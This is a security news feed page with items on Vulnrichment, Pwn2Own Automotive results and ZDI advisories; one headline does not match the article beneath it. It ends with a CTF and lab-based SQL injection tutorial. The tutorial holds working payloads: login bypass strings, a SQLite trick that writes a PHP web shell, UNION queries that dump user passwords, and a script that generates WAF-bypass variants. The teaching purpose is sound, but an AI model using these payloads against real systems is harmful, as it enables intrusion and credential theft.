Criminal IP and OnTheHub Partner to Deliver Advanced Cybersecurity Solutions for Education
Torrance, United States / California, 22nd January 2025, CyberNewsWire
by Hackread
2025-01-22 05:46:41
Turning Data into Decisions: How CVE Management Is Changing
Every day, hundreds of new Common Vulnerabilities and Exposures (CVEs) are published, many of which target critical systems that keep businesses and governments operational. For cybersecurity professionals, simply knowing that a vulnerability exists is not enough. What’s needed is context—a deeper understanding of the CVE data, its potential impact, and how to prioritize its remediation. Enter Vulnrichment, an initiative launched by the Cybersecurity and Infrastructure Security Agency (CISA) on May 10, 2024. Designed to enhance vulnerability data with context, scoring, and actionable insights, Vulnrichment aims to give cybersecurity professionals a much-needed edge in managing vulnerabilities. Now, several months into the program, it’s clear that Vulnrichment is changing the game for defenders across the industry.

A Turbocharged Upgrade to CVE Data
For anyone responsible for vulnerability management, Vulnrichment offers a significant upgrade. The initiative enhances basic CVE records with:
- Stakeholder-Specific Vulnerability Categorization (SSVC): decision points that evaluate exploitability, impact, and more.
- Common Weakness Enumeration (CWE) IDs: specific details about the root cause of vulnerabilities.
- Common Vulnerability Scoring System (CVSS): standardized metrics that quantify a vulnerability’s severity.
And the best part? You don’t need to lift a finger to access these enriched insights. The additional data is already baked into the CVE feeds you’re likely pulling from resources like CVE.org or GitHub.

How It Works
The enriched Vulnrichment data is stored in the Authorized Data Publisher (ADP) container for each CVE. For example, if you’re analyzing CVE-2023-45727, which recently made it to CISA’s Known Exploited Vulnerabilities (KEV) list, you can easily query enriched fields like “Exploitation” using tools such as jq. This field tells you if a vulnerability is actively exploited, has a proof-of-concept (PoC) exploit, or none of the above. With this actionable intelligence, security teams can focus their efforts on vulnerabilities that pose the greatest risk, making prioritization a more straightforward process.

Benefits of Vulnrichment
Why should you care about Vulnrichment? Here’s what sets it apart:
1. Clarity and Actionability
CVE data on its own often lacks depth. Vulnrichment adds essential context, such as whether a vulnerability has been exploited in the wild or requires user interaction. These insights help cybersecurity teams understand not just the existence of a vulnerability but its real-world risk.
2. Streamlined Prioritization
Deciding what to patch first is no easy task, especially for organizations managing hundreds of vulnerabilities. Vulnrichment simplifies this process by providing insights into:
- Exploitability: Is there an active exploit?
- Technical Impact: How severe is the potential damage?
- Automatability: Can attackers easily exploit this vulnerability?
With this data, security teams can confidently prioritize their remediation efforts, addressing high-risk vulnerabilities before attackers can exploit them.
3. Confidence in Your Data
Vulnrichment ensures that CVE records are more accurate and complete. When key data points are missing from the original CVE record, CISA fills in the gaps, adding crucial details like CWEs and CVSS scores. If new information becomes available from the original source, Vulnrichment adjusts accordingly, ensuring the data remains up-to-date and reliable.

Community Collaboration
One of the standout features of Vulnrichment is its commitment to transparency and community engagement. If users spot an error in the enriched data—like an incorrect CWE assignment—they can report it directly via GitHub. CISA takes these reports seriously and aims to resolve them promptly. This responsiveness not only improves the quality of the data but also fosters trust and collaboration within the cybersecurity community.

Real-World Impact
“Given enough eyeballs, all bugs are shallow,” famously said Eric S. Raymond in The Cathedral and the Bazaar. Vulnrichment exemplifies this philosophy by leveraging the collective expertise of the cybersecurity community to refine and enrich CVE data. But this initiative is more than an academic exercise. It’s a practical, ongoing effort to make vulnerability data more useful and actionable for everyone—from researchers and analysts to IT managers. By adding operational context, scoring, and detailed analysis, Vulnrichment empowers organizations to make smarter, faster decisions about their cybersecurity posture.

Why Vulnrichment Matters
The ability to quickly assess the risk posed by a vulnerability and take action can mean the difference between an attack and a breach. Vulnrichment equips cybersecurity teams with the insights they need to stay one step ahead of attackers. With Vulnrichment, CISA isn’t just enhancing CVE data—it’s building a dynamic, living resource that benefits the entire cybersecurity ecosystem. And in a field where every second counts, that’s a power-up no one can afford to ignore.
by The Cyber Express
2025-01-22 05:00:00
Understanding the EU’s Cyber Resilience Act (CRA)
Find out how the Cyber Resilience Act (CRA) sets new security standards for the EU and how Snyk can help simplify compliance with its developer-friendly tools.
by Snyk
2025-01-22 03:23:23
Pwn2Own Automotive 2025 - Day One Results
Welcome to the first day of Pwn2Own Automotive 2025. We have 18 entries to go through today, and we will be updating the results here as we have them.
- SUCCESS - The team from PCAutomotive used a stack-based buffer overflow to gain code execution on the Alpine IVI. They earn $20,000 and two Master of Pwn points.
- SUCCESS - The team from Viettel Cyber Security used an OS command injection bug to exploit the #Kenwood IVI for code execution. They win $20,000 and 2 Master of Pwn points.
- SUCCESS - Cong Thanh (@ExLuck99) and Nam Dung (@greengrass19000) of ANHTUD used an integer overflow to gain code execution on the Sony XAV-AX8500. They earn themselves $20,000 and 2 Master of Pwn points.
- SUCCESS/COLLISION - Sina Kheirkhah (@SinSinology) of Summoning Team (@SummoningTeam) used a 3-bug combo to exploit the Phoenix Contact CHARX SEC-3150, but one was publicly known. He still earns $41,750 and 4.25 Master of Pwn points.
- SUCCESS/COLLISION - It took a while for us to confirm, but confirm we did! The team from Synacktiv used a stack-based buffer overflow plus a known bug in OCPP to exploit the ChargePoint with signal manipulation through the connector. They earn $47,500 and 4.75 Master of Pwn points.
- SUCCESS - The PHP Hooligans used a heap-based buffer overflow to exploit the Autel charger. They earn $50,000 and 5 Master of Pwn points.
- SUCCESS - The team from GMO Cybersecurity by Ierae, Inc. used a stack-based buffer overflow to confirm their second round exploit of the Kenwood IVI. They earn $10,000 and 2 Master of Pwn points.
- SUCCESS - The Viettel Cyber Security (@vcslab) team used a stack-based buffer overflow to exploit the Alpine IVI. This second round win earns them $10,000 and 2 Master of Pwn points.
- SUCCESS - Sina Kheirkhah (@SinSinology) of Summoning Team (@SummoningTeam) proves he's never going to give us up or let us down by using a hard-coded cryptographic key bug in the Ubiquiti charger. He earns himself $50,000 and 5 Master of Pwn points - putting him in the early lead.
- SUCCESS - It may have taken 3 attempts, but it's confirmed! Thanh Do (@nyanctl) of Team Confused used a heap-based buffer overflow to exploit the Sony IVI. His round 2 win nets him $10,000 and 2 Master of Pwn points.
- SUCCESS - After accessing an open port via power drill, Tobias Scharnowski (@ScepticCtf), Felix Buchmann (@diff_fusion), and Kristian Covic (@SeTcbPrivilege) of fuzzware.io leveraged a stack-based buffer overflow on the Autel MaxiCharger. Their second round win nets them $25,000 and 5 Master of Pwn points.
- COLLISION - Well that's awkward. SK Shieldus (@EQSTLab) used an OS command injection bug, but it was one demonstrated in last year's contest. Alpine chose not to patch it since "in accordance with ISO21434...the vulnerability is classified as 'Sharing the Risk'." Yikes. The SK Shieldus team earns $5,000 and 1 Master of Pwn point. Check out ZDI-24-846 for details on the original bug report.
- FAILURE - Unfortunately, Sina Kheirkhah (@SinSinology) could not get his exploit of the Sony IVI working within the time allotted. He still ends Day One of #Pwn2Own Automotive with $91,750 and 9.25 Master of Pwn points.
- SUCCESS - The Synacktiv (@Synacktiv) team used an OS command injection bug to exploit the Kenwood DMX958XR and play a video of the original Doom game. Their second round win earns them $10,000 and 2 Master of Pwn points.
- SUCCESS/COLLISION - Rob Blakely and Andres Campuzano of the Technical Debt Collectors used multiple bugs to exploit Automotive Grade Linux, but one of the bugs was previously known. They still earn $33,500 and 3.5 Master of Pwn points in their first Pwn2Own attempt.
- SUCCESS - In our first Pwn2Own After Dark submission, Tobias Scharnowski (@ScepticCtf), Felix Buchmann (@diff_fusion), and Kristian Covic (@SeTcbPrivilege) of fuzzware.io leveraged an origin validation error bug to exploit the Phoenix Contact CHARX SEC-3150. The round 2 win earns them $25,000 and 5 Master of Pwn points.
- FAILURE - Unfortunately, Riccardo Mori of Quarkslab (@quarkslab) could not get his exploit of the Autel MaxiCharger AC Wallbox Commercial working within the time allotted.
- COLLISION - Bongeun Koo (@kiddo_pwn) of STEALIEN also used the bug exploited in the Alpine last year. He earns $5,000 and 1 Master of Pwn point - plus lots of style points for the Nyan Cat display.
That wraps up Day 1 of #Pwn2Own Automotive 2025! In total, we awarded $382,750 for 16 unique 0-days. The team of Tobias Scharnowski (@ScepticCtf), Felix Buchmann (@diff_fusion), and Kristian Covic (@SeTcbPrivilege) of fuzzware.io is currently in the lead for Master of Pwn, but Sina Kheirkhah (@SinSinology) is right on their heels. Stay tuned tomorrow for more results and surprises. #P2OAuto
by Zero Day Initiative Blog
2025-01-22 00:49:46
Trump Frees Silk Road Creator Ross Ulbricht After 11 Years in Prison
Donald Trump pardoned the creator of the world’s first dark-web drug market, who is now a libertarian cause célèbre in some parts of the crypto community.
by WIRED Security News
2025-01-22 00:32:46
BreachForums Admin Conor Fitzpatrick (Pompompurin) to Be Resentenced
BreachForums admin Conor Fitzpatrick (Pompompurin) faces resentencing after his lenient 17-day sentence was vacated, highlighting the serious consequences…
by Hackread
2025-01-22 00:00:00
CrowdStrike Researchers Explore Contrastive Learning to Enhance Detection Against Emerging Malware Threats
by CrowdStrike
2025-01-22 00:00:00
ZDI-25-059: Siemens Tecnomatix Plant Simulation WRL File Parsing Stack-based Buffer Overflow Remote Code Execution Vulnerability
This vulnerability allows remote attackers to execute arbitrary code on affected installations of Siemens Tecnomatix Plant Simulation. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The ZDI has assigned a CVSS rating of 7.8. The following CVEs are assigned: CVE-2024-53041.
by Zero Day Initiative Advisories
2025-01-22 00:00:00
ZDI-25-058: Siemens Tecnomatix Plant Simulation WRL File Parsing Out-Of-Bounds Read Remote Code Execution Vulnerability
This vulnerability allows remote attackers to execute arbitrary code on affected installations of Siemens Tecnomatix Plant Simulation. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The ZDI has assigned a CVSS rating of 7.8. The following CVEs are assigned: CVE-2024-53242.
by Zero Day Initiative Advisories
2025-01-22 00:00:00
ZDI-25-057: Siemens Tecnomatix Plant Simulation WRL File Parsing Out-Of-Bounds Write Remote Code Execution Vulnerability
This vulnerability allows remote attackers to execute arbitrary code on affected installations of Siemens Tecnomatix Plant Simulation. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The ZDI has assigned a CVSS rating of 7.8. The following CVEs are assigned: CVE-2024-45471.
by Zero Day Initiative Advisories
2025-01-22 00:00:00
ZDI-25-056: Siemens Tecnomatix Plant Simulation WRL File Parsing Out-Of-Bounds Write Remote Code Execution Vulnerability
This vulnerability allows remote attackers to execute arbitrary code on affected installations of Siemens Tecnomatix Plant Simulation. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The ZDI has assigned a CVSS rating of 7.8. The following CVEs are assigned: CVE-2024-45469.
by Zero Day Initiative Advisories
2025-01-21 23:02:17
[Virtual Event]: Cybersecurity's Most Promising New and Emerging Technologies
by Dark Reading
2025-01-21 22:43:00
5 predictions channel partners need to know for 2025
To help our partners prepare for 2025, we recently spoke to Greg Saenz, VP of Channels at Barracuda, to get his insights on what channel partners and MSPs should be thinking about to succeed in the year ahead.
by Barracuda
2025-01-21 22:25:25
Former CIA analyst pleaded guilty to leaking top-secret documents
A former CIA analyst, Asif William Rahman, pleaded guilty to leaking top-secret National Defense Information on social media in 2024. Asif William Rahman, a former CIA analyst with Top-Secret clearance since 2016, pleaded guilty to leaking classified information on social media in October 2024. Rahman had access to Sensitive Compartmented Information (SCI). On October 17, […]
by Security Affairs
2025-01-21 22:21:50
Trump Fires Cyber Safety Board Investigating Salt Typhoon Hackers
In a letter sent today, the acting DHS secretary terminated membership to all advisory boards, including the Cyber Safety Review Board (CSRB) tasked with investigating state-sponsored cyber threats against the US.
by Dark Reading
2025-01-21 21:50:25
Email Bombing, 'Vishing' Tactics Abound in Microsoft 365 Attacks
Sophos noted more than 15 attacks have been reported during the past three months.
by Dark Reading
2025-01-21 21:35:22
GDPR Compliance in the US: Checklist and Requirements
The European Union (EU)’s General Data Protection Regulation (GDPR) isn’t just a European concern. As GDPR-U.S. interactions become more complex, international businesses (including American ones) must comply with this regulation when handling data from EU citizens. If your company collects, processes, or stores data from the EU or European Economic Area (EEA)—including Iceland, Norway, and Liechtenstein—GDPR compliance is a legal requirement.
by Legit Security
2025-01-21 21:34:03
AI Code Generation: The Risks and Benefits of AI in Software
AI code generation is changing how developers approach their work. Modern code completion AI tools like GitHub Copilot and ChatGPT offer faster development cycles, improved productivity, and the ability to automate repetitive tasks.
by Legit Security
2025-01-21 21:32:13
What PCI Attestation of Compliance Is and How to Get It
Every time a customer swipes their credit card, they trust that business to protect their sensitive payment information against mishandling or fraud. But proving that trust in the right place requires certification.
by Legit Security
2025-01-21 21:30:33
Understanding the Principle of Least Privilege (PoLP)
The rule of least privilege, also known as the principle of least privilege (PoLP), is a security measure for safeguarding sensitive systems and data. PoLP ensures that users, applications, and systems have only the minimum access necessary to perform their tasks. This least privilege access strategy reduces potential attack surfaces, limiting the damage from compromised accounts to enhance overall security.
by Legit Security
2025-01-21 21:15:18
DONOT Group Deploys Malicious Android Apps in India
The advanced persistent threat (APT) group is likely India-based and targeting individuals with connections to the country's intelligence community.
by Dark Reading
2025-01-21 20:38:02
Cybersecurity Expert Rachel Tobac to Keynote 2025 RH-ISAC Cyber Intelligence Summit
VIENNA, VA (January 21, 2025) – The Retail & Hospitality Information Sharing and Analysis Center (RH-ISAC) is thrilled to announce that Rachel Tobac, renowned cybersecurity expert and CEO of SocialProof Security, will deliver the keynote address at the 2025 RH-ISAC Cyber Intelligence Summit, taking place 7–9 April, 2025, in St. Louis, Missouri. In her...
by RH-ISAC
2025-01-21 20:30:38
HPE Investigates After Alleged Data Breach
The company reports that it is not experiencing any operational issues within its business, so far.
by Dark Reading
2025-01-21 20:23:28
SQL Injection 101: Uncovering and Exploiting SQLi VulnerabilitiesIntroduction to SQL Injection What is SQL Injection and Its Types? To define SQL Injection in a single sentence attackers (hackers) inject malicious SQL queries to manipulate or access sensitive data from the database that is connected to the web application. Types of SQL Injection include: In-Band SQL Injection: Error-Based: Extracts information directly from database error messages. Union-Based: Combines multiple query results to fetch unauthorized data. Inferential (Blind) SQL Injection: Boolean-Based: Deduces information by observing differences in application responses based on true/false conditions. Time-Based: Exploits delays in server response times to infer database behavior. Out-of-Band SQL Injection: Uses alternate communication channels, such as DNS or HTTP requests, to exfiltrate data when direct interaction isn’t feasible. How to Test for SQL Injection? To detect and exploit SQL Injection vulnerabilities, follow these steps: Application Mapping: Identify input fields that interact with the database. Fuzzing the Application: Inject SQL-specific characters like '' or "" to trigger errors or anomalies. Use Boolean payloads such as OR 1=1 or OR 1=2 to test for logical conditions. Test time-based payloads (e.g., SLEEP(5)) to observe delays in responses. Deploy Out-of-Band payloads to monitor external server interactions. Analysis: Look for unusual behaviors, such as error messages, data leaks, or response delays, to confirm vulnerabilities. Automation Tools: Use tools like sqlmap, ghauri for systematic testing and enhanced detection accuracy. Image Credits goes to Rana Khalil SQL Injection techniques that I got to learn from CTFs 1.Sanitize {SQL AUTH-BYPASS} Lab Link 🔗: https://app.hackthebox.com/challenges/sanitize This is fun and easy challenge from hackthebox. We all have heard about using payloads like or 1=1 on youtube and various places. 
This challenge abuses exactly that logic to bypass the login. The following wordlist has given me the best results against login pages in CTFs: capture the login request in Burp and fuzz both the username and password fields with Intruder in battering ram mode, so that the same payload lands in both fields at once. https://github.com/payloadbox/sql-injection-payload-list/blob/master/Intruder/exploit/Auth_Bypass.txt Payload: ' or 1=1 -- -
2. Intergalactic Post {SQLi to RCE} Lab Link 🔗: https://app.hackthebox.com/challenges/Intergalactic%2520Post After a bit of trial and error we see that the site accepts our input and often renders an SQL error. After many failed attempts we realise that we could read flag.txt if the SQL injection can be turned into RCE, so we search for "SQLi to RCE". The first hit is the PayloadsAllTheThings repository, which gives the following payload. Payload 1: https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/SQL%20Injection/SQLite%20Injection.md#remote-command-execution-using-sqlite-command---attach-database
First, a word about the X-Forwarded-For header. It lets a web service discover the real client IP address when requests arrive through a proxy or load balancer: each proxy appends the address it saw, and applications typically log or process the value for analytics and security purposes. The catch is that the value is ultimately client-controlled: anyone can send an arbitrary X-Forwarded-For header with a request, and nothing validates it. Any code that takes the header raw, for example by writing it into a visitor-log table, is therefore exposed to injection. By placing strings such as ' OR 1=1 -- in X-Forwarded-For, an attacker can trigger SQL injection, command injection or log poisoning in the backend.
Such attacks can corrupt backend data, defeat IP-based access filters and abuse sloppy logging. The header is an attractive attack path precisely because testers rarely look at it, which leaves the backend weaknesses behind it unexamined. We soon find that the base payload does not work on its own, so we move it into the X-Forwarded-For header and try different web roots such as /var/www, /var and /www. After some trial and error the web root turns out to be /www.
Payload 2: X-Forwarded-For: blahblah','blahblah');ATTACH DATABASE '/www/lol.php' as lol;CREATE TABLE lol.pwn(dataz text); INSERT INTO lol.pwn (dataz) VALUES ("<?php system($_GET['cmd']); ?>");--
Notice that the modified payload wraps the PHP code in double quotes and uses single quotes inside it ($_GET['cmd']), the opposite of the reference payload; the outer quoting has to be whatever the surrounding SQL accepts. The trick works because SQLite's ATTACH DATABASE creates a new file at an attacker-chosen path, so it needs the database process to have write access to the web root and the web server to execute PHP from there. Once the SQL has written lol.php into the web directory we have RCE: requesting the file with a cmd parameter runs our command and returns the flag.
3. picoCTF: More SQLi {SQL auth bypass + manual SQL injection on an SQLite database} Lab Link 🔗: https://play.picoctf.org/practice/challenge/358?page=1&search=more%20sql Many people, myself included, have underestimated the quality of picoCTF's web challenges, and this one is by far my personal favourite. At first glance we have a simple login page. Let's try to bypass the SQL logic with payloads like ' or 1=1 -- On a failed login we get an SQL error, which confirms that the site is probably vulnerable to SQL injection. Time to fuzz for payloads that work; I am using an auth-bypass wordlist for this task. We find 14 payloads that bypass the login logic, and we will stick with this simple one: ' or true-- From here the real challenge starts.
We are given a search bar, from which we are expected to extract the flag.
STEP 1: Initial testing for SQL injection. Inject a simple payload like ' or 123' into the field and look for errors. An SQL syntax error would indicate that the application is vulnerable. In our case the application shows no explicit error, so we proceed blind.
STEP 2: Identify the number of columns. Use UNION SELECT to match the column count of the original query: 123' UNION SELECT null;-- (1 column) 123' UNION SELECT null, null;-- (2 columns) 123' UNION SELECT null, null, null;-- (3 columns) Increase the number of null placeholders until the query executes without error; that count is the number of columns the original query returns. Note that in some CTFs a null renders as nothing at all, so use a visible value (a number or a string) instead of null when you need to see which position is reflected.
STEP 3: Determine data types. Replace each null in turn with a test value ('test', 123, datetime('now')) to learn which positions are rendered and what they accept: 123' UNION SELECT 'text', null, null;-- (column 1 reflects strings) 123' UNION SELECT null, 123, null;-- (column 2 reflects numbers) 123' UNION SELECT null, null, datetime('now');-- (column 3 reflects dates) In our case the query returns 3 columns, found with the following payload: cn' UNION select 1,2,3-- The text before the quote (cn' or 123') is arbitrary; it only has to close the original string literal. Bear in mind that SQLite columns are dynamically typed, so this probe mainly tells you which positions are displayed rather than what a column can hold; on Oracle or PostgreSQL, by contrast, a type mismatch between UNION branches is itself an error.
STEP 4: Extract table names. SQLite keeps its schema in the sqlite_master table, so enumerate tables with: 123' UNION SELECT tbl_name, null, null FROM sqlite_master WHERE type='table';-- This lists every table in the database.
STEP 5: Extract column names. Once you have a table (e.g. more_table), read its CREATE statement from sqlite_master: 123' UNION SELECT sql, null, null FROM sqlite_master WHERE tbl_name='more_table';-- The alternative, PRAGMA table_info('more_table'), does not work in our situation: a PRAGMA is a statement of its own and cannot be embedded in a UNION SELECT (on SQLite 3.16 and later the table-valued form, SELECT name FROM pragma_table_info('more_table'), can be used inside a UNION instead).
STEP 6: Dump data. Knowing the table (more_table) and its column (flag), extract the data: 123' UNION SELECT flag, null, null FROM more_table;--
4. Understanding Second-Order SQL Injection: A Deep Dive. Lab Link 🔗: https://tryhackme.com/r/room/advancedsqlinjection {Task 3} Second-order SQL injection, also called stored SQL injection, is a subtle attack in which the malicious input is stored in the database and only executed later, when the stored value is read back and used in a subsequent query. Unlike classic SQL injection the payload does not fire immediately, so it is easy to miss during initial testing.
How it happens: In the lab's example, user input is escaped with real_escape_string() and stored: $ssn = $conn->real_escape_string($_POST['ssn']); $book_name = $conn->real_escape_string($_POST['book_name']); $author = $conn->real_escape_string($_POST['author']); $sql = "INSERT INTO books (ssn, book_name, author) VALUES ('$ssn', '$book_name', '$author')"; At this stage an input like 12345'; UPDATE books SET book_name = 'Hacked'; -- is stored safely: the escaping protects the INSERT, and the database keeps the original string, quote and all. Later, when the stored book_name is fetched and concatenated into another query without being escaped or parameterised again, the payload executes.
Why it's dangerous: Bypassing front-end validation: escaping is a property of one statement, not of the data, so sanitisation at storage time protects the INSERT only; every later query that reuses the value needs its own parameterisation. Delayed impact: since the payload is dormant until a later interaction, it often escapes detection during initial testing.
Wide attack surface: once stored, the payload can hit any part of the application that reuses the data. Real-world scenario: a stored payload such as '; DROP TABLE books; -- or 12345'; UPDATE books SET book_name = 'Hacked'; -- causes no error on insertion but can alter or destroy data when a later query embeds it. Whether a stacked statement like this actually runs depends on the driver: mysqli_query() executes a single statement, whereas mysqli_multi_query() and some other drivers accept several.
5. Simple SQL WAF bypassing. Lab Link 🔗: https://tryhackme.com/r/room/advancedsqlinjection {Task 4} The SQL query is not executing correctly, which suggests there is a chance of SQL injection. Let's inject the payload Intro to PHP' OR 1=1. The output shows that the injection has no effect. So, what is happening here? When this input reaches the PHP script, str_replace strips the OR keyword and the single quote, leaving a sanitised input in which the components the injection needs are gone.
Payloads get around such keyword and symbol filters by encoding characters and by using alternative syntax. For example, %27 is a single quote ('), %20 a space and %2D%2D is --, which starts an SQL comment. In the payload 1%27%20||%201=1%20--+, the single quote (1') closes the string, || 1=1 adds a condition that is always true, and the -- comment makes the database ignore the rest of the query, so every record comes back. Encoding tools like CyberChef help craft these payloads. Two caveats: URL encoding only defeats a filter that inspects the raw, still-encoded value (PHP decodes $_GET before your script runs, so a filter applied after decoding sees the plain quote), and || is a logical OR only on MySQL; on SQLite, PostgreSQL and Oracle || is string concatenation, so this substitution is MySQL-specific. For a query that expects a book name, injecting Intro to PHP' || 1=1 --+ (URL-encoded) forces the condition true and dumps all database records.
URL encoding keeps the SQL syntax intact while slipping past filters that block special characters or keywords at the transport level. Payload: http://10.10.255.153/encoding/search_books.php?book_name=Intro%20to%20PHP%27%20||%201=1%20--+
6. Some more simple WAF bypasses. Lab Link 🔗: https://tryhackme.com/r/room/advancedsqlinjection {Task 5} SQL injection defences can often be bypassed with obfuscation. Where spaces or common keywords like OR, AND, UNION and SELECT are filtered, replace spaces with other whitespace the parser accepts (%09 tab, %0A line feed, %0C form feed, %0D carriage return, %A0 non-breaking space) or with inline comments (/**/), and replace blocked keywords with operator spellings (|| for OR, && for AND; both MySQL-specific). The script below generates payloads by substituting the placeholders {space} and {op} with these variants. Filters differ from target to target, so a pentester has to try combinations and adapt the strategy.
Now let's write a Python script that generates these variants automatically. It takes a normal payload such as 1' or 1=1-- . The problem with payloads like this is that the application may filter the logical operators (and, or) and the spaces, so we first rewrite the payload with placeholders: 1'{space}{op}{space}1=1{space}-- Here {space} stands for a literal blank and {op} for the logical operator (and, or).
Below is a Python script that encodes basic payloads like the one above; make sure the base payload explicitly contains {space} and {op}.
def generate_payloads(base_payload, file_path=None):
    if not ('{space}' in base_payload and '{op}' in base_payload):
        print("Error: The base payload must include '{space}' and '{op}' placeholders.")
        return []
    # Whitespace substitutes and operator spellings that commonly slip past filters
    spaces = ['%09', '%0A', '%0C', '%0D', '%A0', '/**/']
    operators = ['||', '&&', '|', '&']
    # Generate one payload per (space, operator) combination
    payloads = []
    for s in spaces:
        for o in operators:
            payload = base_payload.format(space=s, op=o)
            payloads.append(payload)
            payloads.append(payload + "%27+")  # variant with a trailing %27+, matching a payload that worked in the lab
    # Optionally write payloads to a file
    if file_path:
        try:
            with open(file_path, 'w') as f:
                f.write("\n".join(payloads))
            print(f"Payloads saved to {file_path}")
        except Exception as e:
            print(f"Error writing to file: {e}")
    else:
        # Print the payloads one per line, ready to paste into Burp Intruder
        print("\nGenerated Payloads:\n")
        print("\n".join(payloads))
    return payloads

if __name__ == "__main__":
    base_payload = input("Enter the base payload (use '{space}' for space and '{op}' for operator placeholders):\n")
    file_option = input("Do you want to save the payloads to a file? (yes/no): ").strip().lower()
    file_path = None
    if file_option == 'yes':
        file_path = input("Enter the file path to save payloads: ").strip()
    generate_payloads(base_payload, file_path)
A run looks like the following:
scripts on master via 🐍 v3.8.10 ❯ python3 basic-sqli-bypass.py
Enter the base payload (use '{space}' for space and '{op}' for operator placeholders): 1'{space}{op}{space}1=1{space}--
Do you want to save the payloads to a file? (yes/no): no
Generated Payloads: 1'%09||%091=1%09-- 1'%09||%091=1%09--%27+ 1'%09&&%091=1%09-- 1'%09&&%091=1%09--%27+ 1'%09|%091=1%09-- 1'%09|%091=1%09--%27+ 1'%09&%091=1%09-- 1'%09&%091=1%09--%27+ 1'%0A||%0A1=1%0A-- 1'%0A||%0A1=1%0A--%27+ 1'%0A&&%0A1=1%0A-- 1'%0A&&%0A1=1%0A--%27+ 1'%0A|%0A1=1%0A-- 1'%0A|%0A1=1%0A--%27+ 1'%0A&%0A1=1%0A-- 1'%0A&%0A1=1%0A--%27+ 1'%0C||%0C1=1%0C-- 1'%0C||%0C1=1%0C--%27+ 1'%0C&&%0C1=1%0C-- 1'%0C&&%0C1=1%0C--%27+ 1'%0C|%0C1=1%0C-- 1'%0C|%0C1=1%0C--%27+ 1'%0C&%0C1=1%0C-- 1'%0C&%0C1=1%0C--%27+ 1'%0D||%0D1=1%0D-- 1'%0D||%0D1=1%0D--%27+ 1'%0D&&%0D1=1%0D-- 1'%0D&&%0D1=1%0D--%27+ 1'%0D|%0D1=1%0D-- 1'%0D|%0D1=1%0D--%27+ 1'%0D&%0D1=1%0D-- 1'%0D&%0D1=1%0D--%27+ 1'%A0||%A01=1%A0-- 1'%A0||%A01=1%A0--%27+ 1'%A0&&%A01=1%A0-- 1'%A0&&%A01=1%A0--%27+ 1'%A0|%A01=1%A0-- 1'%A0|%A01=1%A0--%27+ 1'%A0&%A01=1%A0-- 1'%A0&%A01=1%A0--%27+ 1'/**/||/**/1=1/**/-- 1'/**/||/**/1=1/**/--%27+ 1'/**/&&/**/1=1/**/-- 1'/**/&&/**/1=1/**/--%27+ 1'/**/|/**/1=1/**/-- 1'/**/|/**/1=1/**/--%27+ 1'/**/&/**/1=1/**/-- 1'/**/&/**/1=1/**/--%27+
Once you have a list of payloads, load them into Intruder and start fuzzing; in our lab we found 5 new working payloads that solve it. Note that real-world web applications are far more complex, and for those we need sophisticated, reliable tools such as sqlmap or ghauri to automate testing and evade application defences. The aim of this section is to understand at a basic level what bypassing web application protections involves, not to replicate a real engagement. Stay tuned for upcoming posts on automation tools for SQL injection.
7. Header SQL Injection. Lab Link 🔗: https://tryhackme.com/r/room/advancedsqlinjection {Task 7} Just as with header-based XSS, values from HTTP headers are sometimes embedded in SQL queries, which leads to SQL injection.
In real-world engagements, don't forget to fuzz the HTTP headers with SQL injection payloads too. Payload used: ' UNION SELECT book_id, flag FROM books; # We inject this into the User-Agent header using Burp Suite, and after a successful injection the flag is returned.
Manual SQL injection attacks demystified. Lab Links 🔗: https://portswigger.net/web-security/sql-injection/examining-the-database/lab-listing-database-contents-non-oracle https://portswigger.net/web-security/sql-injection/examining-the-database/lab-listing-database-contents-oracle The techniques below apply to most databases; where Oracle differs, its payload is given explicitly. Since the parameters are passed via GET we can inject straight into the URL. First, as always, check whether characters like ', '' or # cause an internal or database error. Once errors confirm the injection, enumerate the number of columns the query returns so that a UNION SELECT can be lined up with it.
Enumerating the database. Step 1: Find the number of columns returned by the query. https://0a5500ac03d8c8dc8241928700ed0080.web-security-academy.net/filter?category=Gifts%27+UNION+SELECT+%27null%27-- This errors, which confirms that the query returns more than one column; next we try two.
https://0a5500ac03d8c8dc8241928700ed0080.web-security-academy.net/filter?category=Gifts%27+UNION+SELECT+%27null%27,%27null%27-- This works, so the query returns 2 columns; now let's look for some juicy details.
Step 2: Determine which of the returned columns contain text. Verify that both columns render text with a payload like the following in the category parameter: '+UNION+SELECT+'abc','def'-- Both strings are rendered, so both columns accept string data.
Step 3: Find the database version. Remember that the non-Oracle payloads here use MySQL/Microsoft SQL Server syntax; when Oracle differs, the Oracle payload is given separately. '+UNION+SELECT+@@version,+NULL# Make sure you URL-encode this payload, especially @@ and # (# is a MySQL-only comment marker; on Microsoft SQL Server use -- instead).
Step 3 (Oracle): Manual database enumeration on Oracle. Initial enumeration shows that ' causes an internal error, that the query returns two columns, and that both accept strings: Gifts'+UNION+SELECT+'null'-- Gifts'+UNION+SELECT+'null','null'-- '+UNION+SELECT+'abc','def'-- The one tweak needed is that every Oracle SELECT requires a FROM clause, so we add Oracle's built-in dual table to the payload: '+UNION+SELECT+'abc','def'+FROM+dual-- And now it works. Finally, we use the following payload to get the database version on Oracle: '+UNION+SELECT+BANNER,+NULL+FROM+v$version--
Exploiting the database. Step 4: List all the tables present in the database.
Use the following payload to retrieve the list of tables. Again, this works on most databases through information_schema; the Oracle variant is given alongside. '+UNION+SELECT+table_name,+NULL+FROM+information_schema.tables-- On Oracle the same query reads: '+UNION+SELECT+table_name,NULL+FROM+all_tables-- Find the name of the table containing user credentials (Ctrl+F on the page helps).
Step 5: List the columns of the table we want to dump. Use the following payload (replacing the table name) to retrieve the table's columns: '+UNION+SELECT+column_name,+NULL+FROM+information_schema.columns+WHERE+table_name='users_pewrif'-- On Oracle the payload uses all_tab_columns instead of information_schema, and the table name is upper case because Oracle stores unquoted identifiers that way: '+UNION+SELECT+column_name,NULL+FROM+all_tab_columns+WHERE+table_name='USERS_ABCDEF'-- Find the names of the columns containing usernames and passwords.
Step 6: Dump the data from those columns. Use the following payload (replacing the table and column names) to retrieve the usernames and passwords of all users: '+UNION+SELECT+username_phrgmq,+password_tyyaor+FROM+users_pewrif-- On Oracle the payload is the same; just supply the correct table and column names. Find the password for the administrator user and use it to log in.
